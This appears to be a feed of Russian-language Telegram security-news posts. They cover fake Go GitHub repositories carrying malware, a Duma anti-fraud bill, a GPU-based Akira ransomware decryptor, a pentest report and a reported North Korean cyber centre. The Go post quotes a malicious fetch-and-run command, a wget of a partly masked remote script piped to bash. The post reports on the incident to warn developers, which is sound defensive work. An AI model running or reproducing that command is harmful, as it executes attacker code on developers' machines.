📄 Ландшафт угроз для систем промышленной автоматизации. Четвертый квартал 2024 — регионы.

👉 Источник: Kaspersky ICS CERT

✋ @Russian_OSINT

🥷❗️Массовая атака на Go-разработчиков через поддельные GitHub-репозитории

В сообществе Go-разработчиков случился неприятный инцидент. Представители популярного проекта Atlas заметили, что злоумышленники "клонировали" один из их репозиториев на GitHub (GORM Provider), накрутили ⭐️ звёзды с помощью фейковых аккаунтов и 🦠внедрили вредоносный код, который выполняется при запуске. Проблема оказалась масштабнее, чем предполагалось изначально. В сети обнаружены десятки других репозиториев, использующих аналогичный метод атаки.

Поддельный репозиторий — ↔️ https://github[
.]com/readyrevena/atlas-provider-gorm (удалён) содержал скрытый код, загружающий и исполняющий вредоносный Bash-скрипт с удалённого сервера через команду:

wget -O - https://reque***ne.fun/storage/de373d0df/a31546bf | /bin/bash &

Ззлоумышленники потенциально могут выполнить код на машине разработчика: установить вредоносное ПО, шпионские программы или 🔒 шифровальщики. Исследователи безопасности обнаружили более 690 потенциально опасных репозиториев, получивших звёзды от фейковых аккаунтов, включая:

https://github.com/esteemedpar/guetzli-go (удалено)
https://github.com/closeddigit/macos-totp-cli (удалено)
https://github.com/frillymacaro/ai-search4ai-go (удалено)

и множество других.

Замечены вредоносные клоны: kubernixos, shelly-bulk-update, terraform-provider-atlas, gonet.

Ещё проблема состоит в том, что Go-разработчики часто устанавливают зависимости через go get <URL>, что делает возможным случайное добавление поддельного пакета в проект. В отличие от экосистемы npm или PyPI, у Go отсутствует централизованный механизм валидации пакетов.

🛡 Звучат различные идеи по улучшению безопасности:

1️⃣ Одобрение модулей перед публикацией (Modules Approval Process).
2️⃣ Введение доверенных издателей (Trusted Publishers).
3️⃣ Ограничения на установку неподтвержденных пакетов в go.mod.
4️⃣ Автоматическая проверка пакетов на вредоносный код в Go Proxy.
5️⃣ Более оперативное удаление вредоносных пакетов и форков на GitHub.
6️⃣ Создание инструментов для анализа зависимостей (аналог npm audit).

👆 Сообщество начало активно репортить вредоносные репозитории в саппорт GitHub. Microsoft пока только частично приняла меры по удалению репозиториев с сюрпризом. Некоторые всё ещё остаются доступны.

✋ @Russian_OSINT

🇷🇺 Государственная Дума приняла в первом чтении законопроект, направленный на защиту граждан от телефонных мошенников и кибермошенников

Как сообщается на сайт duma.gov.ru, рассмотрение во втором чтении должно быть в приоритетном порядке, подчеркнул в ходе пленарного заседания Председатель ГД Вячеслав Володин. Он сообщил, что оно может состояться уже 25 марта.

Законопроектом, в частности, закрепляется возможность онлайн-обмена информацией между государственными органами, банками и цифровыми платформами. В пояснительной записке к документу отмечено, что автоматический мониторинг позволит практически моментально выявлять подозрительные действия, блокировать их и уведомлять правоохранительные органы о потенциальных преступлениях.

Кроме этого, инициативой:

💠вводится обязательная маркировка звонков от организаций и вызовов с международных номеров;

💠предлагается запретить сотрудникам государственных органов, банков и операторов связи и иным субъектам общаться с гражданами и клиентами через мессенджеры;

💠предлагается создать информационную антифрод-платформу, на которой будут храниться образцы голосов тех, кто использует доверие граждан в корыстных целях;

💠устанавливается запрет на передачу сим-карт третьим лицам;

💠для граждан вводится возможность установления запрета на заключение договоров об оказании услуг подвижной радиотелефонной связи без личного присутствия (запрет можно будет установить через портал «Госуслуги» или при обращении в МФЦ, а снять – только при личном посещении МФЦ).

Предусмотрены и иные нововведения, направленные на защиту от противоправных деяний, совершаемых с использованием информационных технологий. Законопроект объединил около 30 мер борьбы с мошенниками.

✋ @Russian_OSINT

Канал 🔨SecAtor — @true_secator пишет интересное:

Исследователь Йоханес Нугрохо раскрыл подробности метода взлома для шифрования Akira ransomware и восстановления исходных файлов.

На основе результатов своего исследования разработал дешифратор для Linux-версии Akira, который задействует вычислительную мощность GPU для извлечения ключа дешифрования и разблокировки файлов.

При этом сам метод не универсален и работает только с вариантами Akira 2024.

За разработку дешифратора Йоханес взялся после обращения его друга с просьбой о помощи.

Тогда он рассчитал, что зашифрованную систему можно взломать за неделю, учитывая, что Akira генерирует ключи шифрования с использованием временных меток (в наносекундах).

Но в виду непредвиденных сложностей на это потребовалось три недели и 1200 долларов на аренду мощности графического процессора, которая позволила взломать ключ шифрования.

Дешифратор работает иначе, нежели традиционные инструменты дешифрования.

Он перебирает ключи шифрования (уникальные для каждого файла) в расчете на то, что шифратор Akira генерирует свои ключи шифрования на основе текущего времени в качестве начального числа.

Начальное значение шифрования - это данные, используемые с криптографическими функциями для генерации сильных, непредсказуемых ключей шифрования.

Akira полагается не на один момент времени, а использует четыре, каждый с наносекундным разрешением.

Генерация ключа сложна, включает 1500 раундов SHA-256 для каждой временной метки.

Уровень точности временных меток реализует более миллиарда возможных значений в секунду, что затрудняет подбор ключей с помощью брута.

Кроме того, Akira на Linux шифрует несколько файлов одновременно, используя многопоточность, что затрудняет определение используемой временной метки и еще больше усложняет ситуацию.

Исследователь сузил возможные временные метки, просмотрев файлы журналов, которыми поделился его друг.

Это позволило увидеть, когда была запущена программа-вымогатель, метаданные файла для оценки времени завершения шифрования и создать бенчмарки шифрования на различном оборудовании для создания предсказуемых профилей.

Первые попытки с использованием RTX 3060 были слишком долгими, с потолком всего в 60 млн. тестов шифрования в секунду. Обновление до RTC 3090 тоже не помогло.

В конце концов исследователь обратился к облачным сервисам RunPod и Vast.ai, чтобы подтвердить эффективность своего инструмента.

В частности, он задействовал шестнадцать графических процессоров RTX 4090 для подбора ключа дешифрования примерно за 10 часов.

Однако в зависимости от количества зашифрованных файлов, требующих восстановления, процесс может занять несколько дней.

Исследователь отметил в своей статье, что эксперты по графическим процессорам могут оптимизировать его код, поэтому производительность, вероятно, может быть улучшена.

Дешифратор доступен на GitHub вместе с инструкциями по восстановлению файлов, зашифрованных Akira.

📄 У ГК «Солар» вышел отчет "Ключевые уязвимости информационных систем российских компаний" за 2024.

▶️Внешний периметр 91% компаний оказался уязвим к атакам, успешная реализация которых может привести к проникновению во внутреннюю сеть, компрометации узлов внешнего периметра или получению доступа к чувствительным данным и критичным внешним системам и приложениям.

▶️Одними из самых распространенных проблем внешних периметров российских компаний остаются слабые пароли (38%) и устаревшие версии программного обеспечения, подверженные различным уязвимостям (32%);

▶️Самым распространенным недостатком веб-приложений оказалось раскрытие отладочной и конфигурационной информации (70%).

▶️Самые распространенные недостатки серверной части мобильных приложений связаны с раскрытием отладочной и конфигурационной информации (53%) и некорректной реализацией контроля доступа (40%). А основной проблемой клиентской части в 2024 году стало отсутствие обфускации исходного кода мобильного приложения (40%).

👉 Источник: https://rt-solar.ru/upload/iblock/167/nwp1jck6a3smiv3v8jc0uyv33araze5p/PDF_Analiticheskiy-otchet-po-pentestu-2024.pdf

✋ @Russian_OSINT

🇰🇵Северная Корея делает ставку на ИИ и наступательный киберпотенциал

По данным южнокорейских СМИ Daily NK из 🇰🇷Сеула, КНДР якобы запустила в работу новый исследовательский центр «227» под управлением Генерального разведывательного бюро (ГРБ), пытаясь сосредоточить усилия на разработке наступательных кибертехнологий, включая разработку ИИ-инструментов и ПО для кражи данных/ взлома. По словам источника Daily NK, создание Центра якобы началось 9 марта по прямому указанию Ким Чен Ына. Он будет расположен в районе Мангёндэ, отдельно от основной штаб-квартиры ГРБ в Пхеньяне.

Утверждается, что ключевой задачей центра является разработка технологий для нейтрализации западных систем кибербезопасности, а также создание автоматизированных программ для сбора и анализа информации. Основной упор делается именно на наступательные возможности, а не только сбор разведданных.

Центр будет функционировать круглосуточно 24/7, оперативно реагируя на запросы от хакерских подразделений, действующих за рубежом. Если верить информации источника Daily NK, то КНДР постепенно переходит к более централизованной стратегии ведения информационной войны. В перспективе ожидается полная автоматизация атакующих инструментов с использованием ИИ.

Новому центру для решения своих задач понадобится около 90 высококвалифицированных специалистов, окончивших высшие образовательные учреждения с углублённой подготовкой в области программирования и ИБ. Элитные кадры не будут участвовать в кибероперациях, но сосредоточатся на разработке инструментов для ведения высокотехнологичной кибервойны.

По данным источников, КНДР сделала качественный скачок в киберпространстве за последнее время. Основная ставка делается на ИИ, масштабируемость киберопераций и оперативное реагирование в реальном времени.

✋ @Russian_OSINT